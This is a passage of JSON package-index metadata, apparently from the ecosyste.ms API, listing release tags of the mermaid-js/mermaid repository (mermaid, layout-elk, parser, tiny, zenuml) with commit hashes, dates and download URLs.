s_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.9","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.9/manifests"},{"name":"@mermaid-js/tiny@11.10.0","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.10.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.0/manifests"},{"name":"@mermaid-js/mermaid-zenuml@0.2.2","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/mermaid-zenuml@0.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/mermaid-zenuml@0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fmermaid-zenuml%400.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.2/manifests"},{"name":"mermaid@11.9.0","sha":"767754f4fbfe22e74e0612c5d684e9b58c3c5caf","kind":"commit","published_at":"2025-07-16T08:25:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.9.0/manifests"},{"name":"@mermaid-js/tiny@11.8.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.1/manifests"},{"name":"@mermaid-js/parser@0.6.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.6.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.1/manifests"},{"name":"mermaid@11.8.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.1/manifests"},{"name":"@mermaid-js/tiny@11.8.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.0/manifests"},{"name":"mermaid@11.8.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.0/manifests"},{"name":"@mermaid-js/parser@0.6.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.0/manifests"},{"name":"@mermaid-js/parser@0.5.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.5.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.8","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.8/manifests"},{"name":"mermaid@11.7.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.7.0/manifests"},{"name":"@mermaid-js/tiny@11.7.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.7.0/manifests"},{"name":"@mermaid-js/mermaid-zenuml@0.2.1","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/mermaid-zenuml@0.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/mermaid-zenuml@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fmermaid-zenuml%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.1/manifests"},{"name":"@mermaid-js/parser@0.4.0","sha":"7b2083926dbe3b6280f42376a0d4195b2c72fb8e","kind":"tag","published_at":"2025-03-25T11:43:55.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.4.0/manifests"},{"name":"mermaid@11.6.0","sha":"7b2083926dbe3b6280f42376a0d4195b2c72fb8e","kind":"tag","published_at":"2025-03-25T11:43:55.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.6.0/manifests"},{"name":"mermaid@11.5.0","sha":"41a737f6821df4cdeab75643984912b82c1dff7a","kind":"tag","published_at":"2025-03-13T10:34:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.5.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.7","sha":"becadf0a7de509b6cc81e99a04abfa6cba8e7bfd","kind":"tag","published_at":"2024-11-27T17:15:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.7/manifests"},{"name":"@mermaid-js/layout-elk@0.1.6","sha":"9868f3a4c3784e214d8b6c74277ca542774e7de9","kind":"tag","published_at":"2024-11-27T11:03:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.6/manifests"},{"name":"mermaid@11.4.1","sha":"9868f3a4c3784e214d8b6c74277ca542774e7de9","kind":"tag","published_at":"2024-11-27T11:03:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.4.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.1/manifests"},{"name":"mermaid@11.4.0","sha":"56f522ec50b5c746be5532686dd465a06215273d","kind":"tag","published_at":"2024-10-30T15:43:30.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.0/manifests"},{"name":"v10.9.3","sha":"85ec96a72d06d45cf5d2b88af6ef0aca2d16c187","kind":"commit","published_at":"2024-10-22T08:32:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.3/manifests"},{"name":"@mermaid-js/layout-elk@0.1.5","sha":"be574845730b1d9f173c7ddb5fb88a3944949672","kind":"tag","published_at":"2024-10-03T14:43:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.5/manifests"},{"name":"mermaid@11.3.0","sha":"be574845730b1d9f173c7ddb5fb88a3944949672","kind":"tag","published_at":"2024-10-03T14:43:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.3.0/manifests"},{"name":"v10.9.2","sha":"4dd4997c4d73784a239bac04deded9ff6866d2b4","kind":"commit","published_at":"2024-10-02T09:31:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.2/manifests"},{"name":"mermaid@11.2.1","sha":"d63dc319c7c57a9900932fe4920be6a4e54570d5","kind":"tag","published_at":"2024-09-16T16:41:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.1/manifests"},{"name":"@mermaid-js/layout-elk@0.1.4","sha":"9c41708d9e439f4cf82c0c954e6c40217f6754e4","kind":"tag","published_at":"2024-09-09T14:03:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.4/manifests"},{"name":"mermaid@11.2.0","sha":"80903ec281db9053486f7dbfeae8430d2618e54d","kind":"tag","published_at":"2024-09-09T13:23:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.0/manifests"},{"name":"mermaid@11.1.1","sha":"73147196b11e38bf825df17ca5f319aa54748b90","kind":"tag","published_at":"2024-09-06T17:19:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.1/manifests"},{"name":"mermaid@11.1.0","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.3","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.3/manifests"},{"name":"@mermaid-js/parser@0.3.0","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.3.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.2","sha":"95274278f39a31f00188935f3d7d1f0c3ccc607a","kind":"tag","published_at":"2024-08-24T07:21:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.2/manifests"},{"name":"mermaid@11.0.2","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.2/manifests"},{"name":"@mermaid-js/layout-elk@0.1.1","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.1/manifests"},{"name":"@mermaid-js/parser@0.2.0","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.2.0/manifests"},{"name":"mermaid@11.0.1","sha":"4d10e3f2586fb8b08b72d93a1036a17d53153997","kind":"tag","published_at":"2024-08-23T15:04:26.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.1/manifests"},{"name":"v11.0.0","sha":"2cfdd1620a8ceef37c0b738569dfb8bcc0005547","kind":"commit","published_at":"2024-08-23T12:07:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v11.0.0","html_url